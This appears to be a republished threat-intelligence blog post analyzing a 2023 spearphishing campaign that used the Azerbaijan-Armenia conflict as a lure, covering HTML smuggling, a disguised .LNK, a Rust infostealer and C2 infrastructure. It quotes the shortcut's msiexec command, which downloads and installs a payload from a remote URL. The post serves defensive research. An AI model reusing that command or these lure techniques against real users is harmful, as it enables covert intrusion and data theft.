X-Industry

In 1923, the Soviet Union created the Nagorno-Karabakh Autonomous Oblast (an oblast is an administrative region or province) within the Azerbaijan Soviet Socialist Republic.  This oblast has a 95% ethnically Armenian population.  In 1988, Nagorno-Karabakh intended to leave Azerbaijan and join the neighboring Republic of Armenia.  While the Soviet Union was able to keep the resulting tension under control, once the USSR began to collapse, armed conflict between Azerbaijan and Armenia began for control of the Nagorno-Karabakh region.  While a ceasefire was tentatively reached in 1994 and again in 2020, tensions remain high between the two countries.

Affected platforms: Microsoft Windows
Impacted parties: Targeted mgmt associated with an Azerbaijanian company
Impact: Reconnaissance of basic computer info of targeted users
Severity level: Low

A Spearphishing Campaign Exploits the Azerbaijan-Armenia Conflict - In August 2023, FortiGuard Labs discovered an infected memo pretending to come from the current president of a company in Azerbaijan and aimed at the management teams of associated businesses.  Opening this memo downloads malware designed to gather basic information from its targets.[1]

Figure 2. Memo

This blog analyzes the attack chain, reviews the malware’s capabilities, and reveals the possible location of the threat actor behind it.

Anatomy of an Attack - FortiGuard Labs spotted this attack by finding the memo in Figure 2. The memo claims to have information about a border clash between soldiers from Azerbaijan and Armenia.

Figure 3. Attack flow

The memo is in HTML format and uses HTML smuggling to deliver a password-protected archive automatically.  This archive, as the memo suggests, contains several images. As shown in the attack diagram in Figure 3, the archive contains three clean images and one phony image.  The actual contents are illustrated below.

Figure 4. Contents of the zip archive with parts obfuscated for PII purposes

An astute observer may notice that the first "image" is not an image file. In reality, it is a .LNK shortcut that executes the following command:

..\..\Windows\System32\msiexec.exe /i "https://dl[.]dropboxusercontent[.]com/scl/fi/zjxgh8ofdmfca8bpfntw9/karabakh.jpg.msi? rlkey=nidpjpx3ioigoq6qonibztwg4&dl=0"

This command downloads an .MSI (Microsoft Installer) file. Figure 3 shows this MS installer file performing two actions when clicked.  The first action is to display an image with the same filename as the phony image shortcut (shown in the zip archive in Figure 4):

Figure 5. The phony image is shown when the .LNK shortcut is executed

This technique may fool some users into thinking the shortcut was simply an image file. But this is misdirection.  Instead, the installer simultaneously loads hidden malware into the targeted computer.

Malware - The malicious installer creates a new folder in the user’s %APPDATA% folder called “Windows Defender Health Check.”  It also installs malware with the same name:

C:\Users\[username]\AppData\Roaming\Windows Defender Health Check\WindowsDefenderHealthcheck.exe

Uncommon Traits - This malware is programmed in RUST, which is not the programming language of choice for most malware authors.  This makes using standard analysis tools and methods somewhat less useful.  The fact that RUST is used already makes this threat actor different.  However, this is not the only trait that makes this malware distinct.

For persistence, a temporary file is created called “24rp.xml.”  This file is used to create a scheduled task.

Figure 6. Scheduled task - Once the scheduled task is created, the .XML file is deleted.  

This technique assumes that the intended targets leave their computers on overnight so the malware can execute outside regular office hours when it is less likely to be noticed.  Moreover, for even greater stealth, the malware can sleep for random amounts of time when performing its tasks.

Figure 7. Sleep between 10 and 20 minutes

Next, we will refer back to Figure 2 for another indication of how this malware attempts to stay hidden. Notice the memo is dated August 8^th. We found that this malware was created the previous day by examining its compile timestamp.

Figure 8. Creation time of the malware

This short timeframe makes it virtually impossible to release the malware before the attack starts accidentally.

Stealing Information - Ultimately, the malware acts like an infostealer, gathering basic computer information and sending it to a C2 server.  The following commands are executed:

Figure 9. Commands executed by the malware

These commands suggest that the threat actor is still in the early stages of fully attempting to compromise its targets.  The information being gathered from these commands could be used to tailor specific attacks for each infected target.

This infostealer is unique because it also collects a list of environment variables and takes an extra step to check for any proxy servers in use.

Figure 10. Checking for proxy

If a proxy server is set, the malware understands how to route its traffic.  The malware issues a POST request to send the encrypted information it stole to a C2 server owned by the threat actor, 78[.]135.73.140, through port 35667.

Tracking a Possible Threat Actor - Our telemetry found nothing too interesting with the C2 server itself.  However, digging into the server uncovered additional information.  Using data from PDNS and other records, the C2 server 78[.]135.73.140 does not seem to be a shared server.  This suggests the threat actor has total control and setup of the server.  With this assumption, we searched to discover more of the threat actor’s network infrastructure.  Inside the /24 subnet alone, four additional servers were revealed:
Figure 11. Partial network infrastructure

Using the August 8^th date on the memo as a starting point, we searched traffic going to these servers in the month prior.  While we did not find significant amounts of traffic, we identified one IP address in Colombia that connected to the server 78[.]135.73.188 in July on a port commonly used for VPN for a substantial amount of time. If the threat actor wanted to hide their activity, using a VPN server under their control would accomplish the job.  The Colombia IP address belongs to a cellular company, which suggests the user may have been using a mobile hotspot.  If so, this may be the location of the attacker.

Conclusion - The threat actor in this campaign uses a few advanced techniques, including RUST and after-hours execution, to help it stay under the radar and make analysis more difficult.  The size of the network infrastructure also suggests this threat actor is not a run-of-the-mill malware developer but someone with access to resources.  

Using a geopolitical rule indicates that this threat actor is plugged in and knows how to target specific users.

File IOCs

Network IOCs

This article is presented at no charge for educational and informational purposes only.

Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization and has reported extensively on AI technology.  For questions, comments, or assistance, please get in touch with the office directly at 1-844-492-7225 or feedback@redskyalliance.com    

Weekly Cyber Intelligence Briefings:

• Reporting: https://www.redskyalliance.org/
• Website: https://www.redskyalliance.com/
• LinkedIn: https://www.linkedin.com/company/64265941 

Weekly Cyber Intelligence Briefings:

REDSHORTS - Weekly Cyber Intelligence Briefings

https://attendee.gotowebinar.com/register/5993554863383553632

[1] https://www.fortinet.com/blog/threat-research/threat-Actors-exploit-the-tensions-between-azerbaijan-and-armenia?lctg=141970831